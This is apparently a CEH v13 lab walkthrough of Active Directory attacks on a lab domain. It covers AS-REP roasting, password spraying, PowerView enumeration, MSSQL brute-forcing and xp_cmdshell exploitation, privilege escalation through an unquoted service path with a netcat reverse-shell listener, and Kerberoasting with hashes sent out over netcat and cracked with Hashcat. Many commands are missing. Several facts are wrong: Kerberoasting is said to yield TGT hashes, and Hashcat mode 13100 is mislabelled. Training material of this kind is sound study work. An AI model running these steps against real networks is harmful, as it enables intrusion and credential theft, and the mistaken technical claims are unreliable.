5. Active Directory (AD) Attacks
The module has recently been added in CEH V13 Practical
Last updated
The module has recently been added in CEH V13 Practical
Last updated
The initial scan in AD enumeration is crucial as it identifies the network structure, open ports, and services. This information helps ethical hackers map the AD environment, uncover vulnerabilities, and plan targeted attacks to assess security measures and identify potential weaknesses.
Port 88/TCP kerberos-sec and port 389/TCP LDAP opened which confirms that our DC IP address is 10.10.1.22
We get the domain name and FQDN.
An AS-REP roasting attack targets user accounts in AD that do not require Kerberos pre-authentication, exploiting the DONT_REQ_PREAUTH setting. Attackers can request a ticket-granting ticket (TGT) for these accounts without needing the user's password.
The DC responds with an encrypted TGT, which the attacker captures. This TGT, encrypted with the user's password hash, is then subjected to offline password-cracking tools such as Hashcat or John the Ripper. By rapidly guessing the password, the attacker can eventually decrypt the TGT, revealing the user's password.
GetNPUsers.py: Python script to retrieve AD user information.
CEH.com/: Target AD domain.
-no-pass: Flag to find user accounts not requiring pre-authentication.
-usersfile ~/ADtools/users.txt: Path to the file with the user account list.
-dc-ip 10.10.1.22: IP address of the DC to query.
In Kali, we can use the following command as well
We can observe that the user Joshua has DONT_REQUIRE_PREAUTH set. As this user is vulnerable to AS-REP roasting, we obtain Joshua's password hash. Copy that hash and save it as joshuahash.txt. Execute the command echo '[HASH]' > joshuahash.txt.
Now crack the hash.
Using CrackMapExec for password spraying involves leveraging its capabilities to automate the process. For instance, if "cupcake" is a cracked password, CME can be used to test this password against numerous user accounts and services across a network. This approach helps identify other accounts that may be using the same password, facilitating further penetration testing or security assessments.
You can spray the password as per the Nmap scan results on services which are running on our target.
rdp: Targets the Remote Desktop Protocol (RDP) service.
10.10.1.0/24: IP address range to target, encompassing all hosts within the subnet 10.10.1.0 with a subnet mask of 255.255.255.0.
-u /root/ADtools/users.txt: Specifies the path to the file containing user accounts for authentication.
-p "cupcake": Password which we cracked using AS-REP Roasting to test against the RDP service on the specified hosts.
We find that user Mark is using the same password cupcake on host 10.10.1.40. We can try to connect to RDP as user mark.
PowerView is a PowerShell tool designed for network and AD enumeration. It helps security professionals gather detailed information about user accounts, groups, computers, and domain trusts. PowerView is used to identify potential security weaknesses and misconfigurations in an AD environment. It is commonly employed in penetration testing and red team operations. It works from Windows.
Launch PowerShell by searching for it in Windows search option. Now, execute the command . .\PowerView.ps1 to load the PowerView.ps1 script in PowerShell. (You should have downloaded the script)
First we need to bypass antivirus protection and then we can run the script.
Execute Get-NetComputer command in PowerShell. This command will display all the information related to computers in AD. It lists all computer objects in AD, which can help in identifying network targets and mapping the AD environment.
Execute Get-NetGroup in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.
Execute command Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships. It helps identify potential targets and understand the AD environment better.
We found a new user SQL_srv, who has some high privileges and could be useful for further attacks.
Here are some other listed commands that you can use with PowerView.ps1 for enumeration:
Get-NetOU - Lists all organizational units (OUs) in the domain.
Get-NetSession - Lists active sessions on the domain.
Get-NetLoggedon - Lists users currently logged on to machines.
Get-NetProcess - Lists processes running on domain machines.
Get-NetService - Lists services on domain machines.
Get-NetDomainTrust - Lists domain trust relationships.
Get-ObjectACL - Retrieves ACLs for a specified object.
Find-InterestingDomainAcl - Finds interesting ACLs in the domain.
Get-NetSPN - Lists service principal names (SPNs) in the domain.
Invoke-ShareFinder - Finds shared folders in the domain.
Invoke-UserHunter - Finds where domain admins are logged in.
Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines.
xp_cmdshell is a SQL server stored procedure enabling command shell execution. Misconfigured xp_cmdshell can lead to arbitrary command execution, data exfiltration, and potential network compromise, posing significant security risks. Proper configuration and security measures are crucial to mitigate these risks.
The service runs on port 1433 and we will brute force the password first.
Save the username SQL_srv in a text file and name it as user.txt using command pluma user.txt.
Now, bruteforce the password for MSSQL
We have successfully cracked the password for SQL_srv, which is "batman". Next, we will attempt to log into the service using mssqlclient.py.
Now, execute the following command.
Now, as we know that xp_cmdshell is enabled on SQL server we can use Metasploit to exploit this service.
Once the exploitation is complete, we will be getting a Meterpreter session. You can move to shell by typing shell.
WinPEASx64.exe is a tool for Windows privilege escalation, identifying misconfigurations and vulnerabilities for potential exploitation.
The Unquoted Service Path vulnerability in the RunOnce registry key arises when a Windows service path lacks proper quotation marks and contains spaces, enabling attackers to execute arbitrary code with elevated privileges during system startup.
It is assumed that you still have the shell from last task.
Move to C:\Users\Public\Downloads using cd and execute the command powershell.
Now, we need to host winPEASx64.exe on the attacker machine using Python. Open a new terminal, type sudo su, press Enter, and use toor as password. Execute the command cd /root/ADtools.
Type python3 -m http.server and press Enter to host the winPEASx64.exe file.
Get back to the shell terminal and type
Once winpeas.exe is downloaded, execute it with ./winpeas.exe
Once the execution is completed, observe the output. Here, we have a file named file.exe in C:\Program Files\CEH Services that is unquoted and can be exploited for privilege escalation.
Open a new terminal with root privileges using the command sudo su and toor as password and create a payload.
Go to another terminal and type nc -nvlp 8888 and press Enter
Get back to our shell terminal and move to C:\Program Files\CEH Services. Execute the command
Execute the command.
Switch to the Windows Server 2019 (AD) machine, assuming we are the victim now. Restart the machine by hovering over Power and Display button and click Reset/Reboot button present at the toolbar located above the virtual machine and log in with the username SQL_srv and password "batman." We will get a shell on our Parrot OS.
Rubeus is a tool for exploiting Kerberos weaknesses in Windows environments. Kerberoasting is a method to extract ticket granting ticket (TGT) hashes from AD. Attackers target service accounts with associated Kerberos service principal names (SPNs). TGTs are requested from the DC for these accounts, then cracked offline to reveal user passwords. Kerberoasting exploits weak service account passwords and the nature of Kerberos authentication.
We assume that we already have a shell on a windows system meaning access to AD environment.
In the netcat shell, execute the powershell command to launch PowerShell. Navigate to C:\Users\Public\Downloads and execute the command cd ../.. ; cd Users\Public\Downloads
Now, we will be downloading Rubeus and netcat. Execute the command
Type cd ../.. && cd Users\Public\Downloads and press Enter to move into the Downloads folder
Execute the command
After kerberoasting the password hash for DC-Admin is saved in hash.txt file
To get that hash file on the attacker machine, we will be using netcat. Open a new terminal, type sudo su and press Enter; use toor as password. Then execute the command
In the shell terminal, execute the command.
Get back to the netcat listener terminal and press Enter to save the file.
Now, we will be using HashCat to crack the password hash
-m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 AS-REQ Pre-Auth etype 23 (RC4-HMAC), a specific format for Kerberos hashes.
--force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.
-a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.
hash.txt: is the input file containing the hashes to crack
/root/ADtools/rockyou.txt: is the wordlist file used for the attack
After completation, we get the password advanced!. As DC-Admin has high privileges on the domain, we can use this password for further attacks.
